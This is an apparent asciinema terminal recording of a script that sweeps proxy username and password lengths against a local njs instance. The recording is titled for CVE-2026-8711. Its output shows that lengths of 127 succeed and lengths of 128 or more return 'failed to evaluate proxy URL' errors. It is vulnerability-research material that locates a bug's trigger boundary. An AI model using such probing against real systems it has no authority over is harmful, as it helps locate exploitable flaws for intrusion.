{"version":3,"term":{"cols":117,"rows":32},"timestamp":1779316904,"idle_time_limit":1.0,"command":"python3 tools/njs_fetch_proxy_len_sweep.py --target 127.0.0.1:19431 --user-lengths 127,128,256 --pass-lengths 127,128,256 --mode both --delay 0.05","title":"CVE-2026-8711 njs non-ASAN length sweep","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.034, "o", "target 127.0.0.1:19431\r\nmode   len sweep over HTTP only; ASLR left enabled\r\ncols   user pass status body_len sample health\r\n"]
[0.072, "o", "127   16    200    70       b'PROXY:Basic QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'      up\r\n"]
[0.115, "o", "128   16    500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.120, "o", "256   16    500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.125, "o", "16    127   200    70       b'PROXY:Basic QUFBQUFBQUFBQUFBQUFBQTpCQkJCQkJCQkJC'      up\r\n"]
[0.113, "o", "16    128   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.113, "o", "16    256   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.115, "o", "127   127   200    70       b'PROXY:Basic QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'      up\r\n"]
[0.113, "o", "127   128   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.115, "o", "127   256   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.114, "o", "128   127   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.114, "o", "128   128   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.115, "o", "128   256   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.115, "o", "256   127   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.127, "o", "256   128   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.124, "o", "256   256   500    28       b'failed to evaluate proxy URL'                          up\r\n"]
[0.067, "x", "0"]
